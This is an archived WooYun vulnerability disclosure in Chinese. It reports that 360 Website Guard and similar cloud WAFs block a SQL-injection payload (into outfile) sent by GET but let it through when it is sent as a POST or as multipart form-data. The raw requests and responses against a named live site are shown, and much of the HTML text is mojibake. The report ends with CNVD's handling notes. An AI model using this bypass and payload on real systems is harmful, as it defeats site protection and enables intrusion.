乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-11-28: 细节已通知厂商并且等待厂商处理中 2013-11-29: 厂商已经确认,细节仅向厂商公开 2013-12-09: 细节向核心白帽子及相关领域专家公开 2013-12-19: 细节向普通白帽子公开 2013-12-29: 细节向实习白帽子公开 2014-01-12: 细节向公众公开
360网站宝等云waf产品在实现的时候存在问题可以导致安全策略绕过
在对GET请求处理的时候都能够识别攻击,但是一旦换成了POST请求或者是改造过的POST就不存在此问题了
GET /index.php?id=1%20into%20outfile%20'/tmp/abc' HTTP/1.1Host: www.xiangshu.comConnection: keep-aliveContent-Length: 1778HTTP/1.1 493Server: nginx/1.2.9Date: Thu, 28 Nov 2013 12:21:35 GMTContent-Type: text/htmlContent-Length: 5538Connection: keep-aliveX-Powered-By-360WZB: wangzhan.360.cn<!DOCTYPE html><html><head> <title>ç¦æ¢è®¿é®</title><meta charset="utf-8" /><meta name="author" content="" /><meta name="keywords" content="" /><meta name="description" content="" /><style>body{margin:0; padding:0;text-align: center;font-family:"微软é é»" Arial, Helvetica, sans-serif;font-size: 14px;color: #666;}div,dl,dd,dt,ul,li,p,h1,h2{margin:0; padding:0;}h1{font-size:22px; line-height:30px; text-align:left; line-height:40px; margin-bottom:10px; color:#666;}.wrap{width:715px; margin:50px auto;}.waring-tips1,.waring-tips2{height:55px; line-height:55px; border-radius:10px; font-size:20px; color:#fff; }.waring-tips1{background:#F8AE01 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;}.waring-tips2{background:#0D5598 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;}.waring-tips1 p,.waring-tips2 p{padding-left:50px; line-height:55px; background:url(/wzws-waf-cgi/wz-warning-icon2.png) no-repeat 15px center;}.main{border:1px solid #D0D0D0; border-radius:10px;}.warning-domain{padding:10px 20px;}.warning-domain dt{color:#000; text-align:left;font-size:20px; font-weight:bold; line-height:30px;}.warning-domain dd{color:#333; text-align:left; font-size:16px; line-height:35px;}.warning-conlist{border-top:1px solid #d0d0d0; padding-top:10px; padding-bottom:10px;}.warning-conlist dl{position:relative;}.warning-conlist dl dt{width:190px; position:absolute; text-align:center;font-size:16px; font-weight:bold; color:#555; left:0; top:0; line-height:45px; text-align:left; text-indent:50px;}.warning-conlist dl dd{margin-left:190px; line-height:45px; text-align:left;}.warning-conlist p{clear:both; font-size:12px; text-align:left; line-height:30px; padding:5px 10px;}</style></head><body><div class="wrap"> <h1 class="waring-tips1"><p>ç¦æ¢è®¿é®</p></h1> <div class="main"> <dl class="warning-domain"> <dt id="host"></dt> <dd>æ¨æ交ç请æ±åå¨å±é©å 容ï¼å·²è¢«ç½ç«å«å£«æ¦æªï¼</dd> </dl> <div class="warning-conlist"> <dl> <dt>æ¦æªç½åï¼</dt> <dd id="wurl"> </dd> </dl> <dl> <dt>æ¦æªæ¶é´ï¼</dt> <dd id="wdate">2013-03-28 16:19:25</dd> </dl> <dl style="margin-bottom:10px; border-bottom:1px solid #ccc"> <dt>å¤çç»æï¼</dt> <dd>IP已被记å½å¹¶æ交è³ç½ç»çå¯é¨é¨å¤æ¡ï¼</dd> </dl> <p>å¦ææ¨æ¯ç«é¿ï¼è¦ç»§ç»è®¿é®ç½å,请è¿å ¥<a href="javascript:void(0);" onclick="tongdao()" style="color:green">[ç«é¿ç»¿è²éé]</a></p> <p >(ç«é¿ç»¿è²ééï¼ç½ç«å«å£«ä¼èªå¨å°å½å被æ¦æªçURLå å ¥é²ç«å¢ç½ååï¼å¨3å°æ¶ä¹å 该URLä¸è¿è¡å®å ¨æ£æµ)</p> </div> </div></div><script type="text/javascript" src="/wzws-waf-cgi/jquery-1.4.2.min.js"></script><script type="text/javascript">function Base64() { // private property _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; // public method for encoding this.encode = function (input) { var output = ""; var chr1, chr2, chr3, enc1, enc2, enc3, enc4; var i = 0; input = _utf8_encode(input); while (i < input.length) { chr1 = input.charCodeAt(i++); chr2 = input.charCodeAt(i++); chr3 = input.charCodeAt(i++); enc1 = chr1 >> 2; enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); enc3 = ((chr2 & 15) << 2) | (chr3 >> 6); enc4 = chr3 & 63; if (isNaN(chr2)) { enc3 = enc4 = 64; } else if (isNaN(chr3)) { enc4 = 64; } output = output + _keyStr.charAt(enc1) + _keyStr.charAt(enc2) + _keyStr.charAt(enc3) + _keyStr.charAt(enc4); } return output; } // private method for UTF-8 encoding _utf8_encode = function (string) { string = string.replace(/\r\n/g,"\n"); var utftext = ""; for (var n = 0; n < string.length; n++) { var c = string.charCodeAt(n); if (c < 128) { utftext += String.fromCharCode(c); } else if((c > 127) && (c < 2048)) { utftext += String.fromCharCode((c >> 6) | 192); utftext += String.fromCharCode((c & 63) | 128); } else { utftext += String.fromCharCode((c >> 12) | 224); utftext += String.fromCharCode(((c >> 6) & 63) | 128); utftext += String.fromCharCode((c & 63) | 128); } } return utftext; } }function HTMLEncode(html) { var temp = document.createElement ("div"); (temp.textContent != null) ? (temp.textContent = html) : (temp.innerText = html); var output = temp.innerHTML; temp = null; return output; } $(document).ready(function(){ $("#host").text(location.hostname); $("#wurl").text(HTMLEncode(location.href)); var myDate = new Date(); $("#wdate").text(myDate.toLocaleString());});function wubao(){ var host = location.hostname; location.href="fankui.html?"+host;}function tongdao(){ var host = location.hostname; var url = HTMLEncode(location.href); var index = url.indexOf("?"); if(index>0){ url = url.substr(0,index); } var b = new Base64(); url = b.encode(url); location.href="http://wangzhan.360.cn/index/shouquan/host/"+host+"/?url="+url;}</script><script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-32745158-2']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })();</script></body></html>
换成
POST /index.php?id=1%20into%20outfile%20'/tmp/abc' HTTP/1.1Host: www.xiangshu.comConnection: keep-aliveContent-Length: 1778HTTP/1.1 493Server: nginx/1.2.9Date: Thu, 28 Nov 2013 12:22:04 GMTContent-Type: text/htmlContent-Length: 5538Connection: keep-aliveX-Powered-By-360WZB: wangzhan.360.cn<!DOCTYPE html><html><head> <title>ç¦æ¢è®¿é®</title><meta charset="utf-8" /><meta name="author" content="" /><meta name="keywords" content="" /><meta name="description" content="" /><style>body{margin:0; padding:0;text-align: center;font-family:"微软é é»" Arial, Helvetica, sans-serif;font-size: 14px;color: #666;}div,dl,dd,dt,ul,li,p,h1,h2{margin:0; padding:0;}h1{font-size:22px; line-height:30px; text-align:left; line-height:40px; margin-bottom:10px; color:#666;}.wrap{width:715px; margin:50px auto;}.waring-tips1,.waring-tips2{height:55px; line-height:55px; border-radius:10px; font-size:20px; color:#fff; }.waring-tips1{background:#F8AE01 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;}.waring-tips2{background:#0D5598 url(/wzws-waf-cgi/wz-warning-logo.png) no-repeat 580px center;}.waring-tips1 p,.waring-tips2 p{padding-left:50px; line-height:55px; background:url(/wzws-waf-cgi/wz-warning-icon2.png) no-repeat 15px center;}.main{border:1px solid #D0D0D0; border-radius:10px;}.warning-domain{padding:10px 20px;}.warning-domain dt{color:#000; text-align:left;font-size:20px; font-weight:bold; line-height:30px;}.warning-domain dd{color:#333; text-align:left; font-size:16px; line-height:35px;}.warning-conlist{border-top:1px solid #d0d0d0; padding-top:10px; padding-bottom:10px;}.warning-conlist dl{position:relative;}.warning-conlist dl dt{width:190px; position:absolute; text-align:center;font-size:16px; font-weight:bold; color:#555; left:0; top:0; line-height:45px; text-align:left; text-indent:50px;}.warning-conlist dl dd{margin-left:190px; line-height:45px; text-align:left;}.warning-conlist p{clear:both; font-size:12px; text-align:left; line-height:30px; padding:5px 10px;}</style></head><body><div class="wrap"> <h1 class="waring-tips1"><p>ç¦æ¢è®¿é®</p></h1> <div class="main"> <dl class="warning-domain"> <dt id="host"></dt> <dd>æ¨æ交ç请æ±åå¨å±é©å 容ï¼å·²è¢«ç½ç«å«å£«æ¦æªï¼</dd> </dl> <div class="warning-conlist"> <dl> <dt>æ¦æªç½åï¼</dt> <dd id="wurl"> </dd> </dl> <dl> <dt>æ¦æªæ¶é´ï¼</dt> <dd id="wdate">2013-03-28 16:19:25</dd> </dl> <dl style="margin-bottom:10px; border-bottom:1px solid #ccc"> <dt>å¤çç»æï¼</dt> <dd>IP已被记å½å¹¶æ交è³ç½ç»çå¯é¨é¨å¤æ¡ï¼</dd> </dl> <p>å¦ææ¨æ¯ç«é¿ï¼è¦ç»§ç»è®¿é®ç½å,请è¿å ¥<a href="javascript:void(0);" onclick="tongdao()" style="color:green">[ç«é¿ç»¿è²éé]</a></p> <p >(ç«é¿ç»¿è²ééï¼ç½ç«å«å£«ä¼èªå¨å°å½å被æ¦æªçURLå å ¥é²ç«å¢ç½ååï¼å¨3å°æ¶ä¹å 该URLä¸è¿è¡å®å ¨æ£æµ)</p> </div> </div></div><script type="text/javascript" src="/wzws-waf-cgi/jquery-1.4.2.min.js"></script><script type="text/javascript">function Base64() { // private property _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; // public method for encoding this.encode = function (input) { var output = ""; var chr1, chr2, chr3, enc1, enc2, enc3, enc4; var i = 0; input = _utf8_encode(input); while (i < input.length) { chr1 = input.charCodeAt(i++); chr2 = input.charCodeAt(i++); chr3 = input.charCodeAt(i++); enc1 = chr1 >> 2; enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); enc3 = ((chr2 & 15) << 2) | (chr3 >> 6); enc4 = chr3 & 63; if (isNaN(chr2)) { enc3 = enc4 = 64; } else if (isNaN(chr3)) { enc4 = 64; } output = output + _keyStr.charAt(enc1) + _keyStr.charAt(enc2) + _keyStr.charAt(enc3) + _keyStr.charAt(enc4); } return output; } // private method for UTF-8 encoding _utf8_encode = function (string) { string = string.replace(/\r\n/g,"\n"); var utftext = ""; for (var n = 0; n < string.length; n++) { var c = string.charCodeAt(n); if (c < 128) { utftext += String.fromCharCode(c); } else if((c > 127) && (c < 2048)) { utftext += String.fromCharCode((c >> 6) | 192); utftext += String.fromCharCode((c & 63) | 128); } else { utftext += String.fromCharCode((c >> 12) | 224); utftext += String.fromCharCode(((c >> 6) & 63) | 128); utftext += String.fromCharCode((c & 63) | 128); } } return utftext; } }function HTMLEncode(html) { var temp = document.createElement ("div"); (temp.textContent != null) ? (temp.textContent = html) : (temp.innerText = html); var output = temp.innerHTML; temp = null; return output; } $(document).ready(function(){ $("#host").text(location.hostname); $("#wurl").text(HTMLEncode(location.href)); var myDate = new Date(); $("#wdate").text(myDate.toLocaleString());});function wubao(){ var host = location.hostname; location.href="fankui.html?"+host;}function tongdao(){ var host = location.hostname; var url = HTMLEncode(location.href); var index = url.indexOf("?"); if(index>0){ url = url.substr(0,index); } var b = new Base64(); url = b.encode(url); location.href="http://wangzhan.360.cn/index/shouquan/host/"+host+"/?url="+url;}</script><script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-32745158-2']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })();</script></body></html>
即不拦如果还拦就换成文件上传的方式
------------gL6ei4ae0GI3Ij5Ij5cH2ei4KM7KM7Content-Disposition: form-data; name="folder"/blog/------------gL6ei4ae0GI3Ij5Ij5cH2ei4KM7KM7Content-Disposition: form-data; name="id"1%20into%20outfile%20'/tmp/abc'
HTTP/1.1 200 OKServer: nginx/1.2.9Date: Thu, 28 Nov 2013 12:22:23 GMTContent-Type: text/htmlConnection: keep-aliveX-Powered-By-360WZB: wangzhan.360.cnX-Powered-By: PHP/5.2.13Content-Length: 6258<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" type="text/css" href="/css/main.css" /><script type="text/javascript" src="/assets/b043222/jquery.js"></script><script type="text/javascript" src="/css/cycle.js"></script><title>æ©¡æ æå½±ç½-ä¸å½æ©¡æ æå½±ç±å¥½è 俱ä¹é¨ www.xiangshu.com</title><meta name="Description" content="æ©¡æ æå½±ç½ www.xiangshu.com ä¸å½è§æ¨¡æ大çæ影俱ä¹é¨" /><link rel="shortcut icon" href="http://www.xiangshu.com/images/xiangshu.ico" /></head><body><div id="wrap"> <div id="header"> <div id="logo"> <div id="logopic"><a href=http://www.xiangshu.com/club/0><img src=http://www.xiangshu.com/images/indexlogo.jpg border=0></a></div> <h1>ä¸å½è§æ¨¡æ大çæ影俱ä¹é¨</h1> </div> <div id="club"><a href="/club/0">æ»ç«</a> <a style="font-size:12px;font-weight:normal;color:red" href="/site/club"> [æ¢åå¸]</a></div> <div id="banner"> <div id="enter"> <a href=http://www.xiangshu.com/read.php?tid=1004568>ç½ç«ç线çµè¯:400-100-8885</a> | <a href=http://www.gxsyxy.com target="_blank">å 线æå½±å¦é¢</a> | <a href=http://www.xiangshu.com/club/0>æ»ç«é¦é¡µå ¥å£</a> </div> <div class="clear"></div> <div id="subnav"> <ul> <li style="background:#006600"><a href=http://www.xiangshu.com/joining.php>注åå è´¹ä¼å</a></li> <li style="background:#99CC00"><a href=http://www.xiangshu.com/read.php?tid=1004568>ç³è¯·VIPä¼å</a> </li> <li style="background:#FF9900"><a href=http://www.xiangshu.com/membercard.php>æç»ä¼åå¡</a></li> <li style="background:#666666"><a href=http://www.xiangshu.com/about/7>æ¯ç¹åä½åæ¡ä¾</a> </li> </ul> </div> </div> </div> <div id="nav"> <div id="nav_l"></div> <div id="nav_bg"> <ul> <li><a href=http://www.xiangshu.com/pic/1>人 æ</a></li> <li>|</li> <li><a href=http://www.xiangshu.com/pic/2>é£ å </a></li> <li>|</li> <li><a href=http://www.xiangshu.com/pic/3>ç¾ å¥³</a></li> <li>|</li> <li><a href=http://www.xiangshu.com/pic/4>å æ</a></li> <li>|</li> <li><a href=http://www.xiangshu.com/thread.php?fid=2>æ影社åº</a></li> <li>|</li> <li><a href=http://www.xiangshu.com/thread.php?fid=64>é©´åä¸åº</a></li> <li class="btn"><a href=http://www.xiangshu.com/site/club>æ´æ¢åå¸åç«</a></li> </ul> </div> <div id="nav_r"></div> </div> <div id="main"> <div id="index_top"></div> <div id="index_bg"> <div id="flash"> <a href="http://www.xiangshu.com/thread.php?fid=2"><img width="538" height="404" src="http://photo.xiangshu.com/2/1385631569.jpg" alt="è¿å ¥å ¶ä»åå¸å¯çæ´å¤å½å°ç²¾åå¾ç" /></a> <a href="http://www.xiangshu.com/thread.php?fid=2"><img width="538" height="404" src="http://photo.xiangshu.com/2/1385571948.jpg" alt="è¿å ¥å ¶ä»åå¸å¯çæ´å¤å½å°ç²¾åå¾ç" /></a> </div> <div id="map"> <div id="iframe"><iframe marginWidth="0" marginHeight="0" frameSpacing="0" src="http://www.xiangshu.com/map/" frameBorder="0" width="300" scrolling="no" height="242"></iframe></div> <div id="news"> <div id="news_tit"><span class="left">æ»ç«å ¬å</span><span class="right">ä»å°å¾è¿ä¿±ä¹é¨ [<a href=club.html>æåå ¥å£</a>] </span></div> <div id="news_list"> <ul> <li> <dl> <dt><a target="_blank" href="/article/view/id/62">ççåºç¥æ©¡æ æå½±ç½åå9å¨å¹´[åæäºåå ]</a></dt> <dd>[10-20]</dd> </dl> </li> <li> <dl> <dt><a target="_blank" href="/article/view/id/61">æ©¡æ ç½ä»£è¡¨åºéåºå¸ä¸å½ç¥åæ¶å客é请èµ</a></dt> <dd>[06-09]</dd> </dl> </li> <li> <dl> <dt><a target="_blank" href="/article/view/id/60">å ³äºå§æåçå çèµ´æ¯åºæ´½è°åä½ç声æ</a></dt> <dd>[04-19]</dd> </dl> </li> <li> <dl> <dt><a target="_blank" href="/article/view/id/59">ç½ç«å级:å¾çè´¨éä¸åå°500K,å¼æ¾å¤é¾</a></dt> <dd>[03-06]</dd> </dl> </li> <li> <dl> <dt><a target="_blank" href="/article/view/id/58">æ©¡æ ç½å¯æ»è£åæ¨çå½å®¶æ£®æå ¬åç¾çº¦</a></dt> <dd>[12-21]</dd> </dl> </li> </ul> </div> </div> </div> </div> <div id="index_bottom"></div></div> <div id="hezuo"> <a href=http://www.xiangshu.com/about/6>å ³äºæ©¡æ </a> - <a href=http://www.xiangshu.com/about/8>èç³»æ们</a> - <a href=http://www.xiangshu.com/link>åæ é¾æ¥</a> [粤ICPå¤11037153å·] </div> </body></html>
就不拦了......
呵呵
危害等级:高
漏洞Rank:15
确认时间:2013-11-29 17:36
CNVD根据所述绕过方法,在国内多个网站安全防护平台上进行了网站抽样测试,测试主要依据在动态页面或交互式页面中对比绕过效果。目前测试在各平台上得到的结果不尽相同。按处置流程,已经先行分别向360网站卫士、百度加速乐、安全宝平台等平台管理方通报。建议各方对防护规则进行升级或就该问题进行针对性技术比对,待后续各方反馈后再进行状态更新。考虑到绕过方法需要结合特定类型漏洞发起攻击,暂不作为通用漏洞进行收录,仅作为风险进行认定。rank 15
暂无
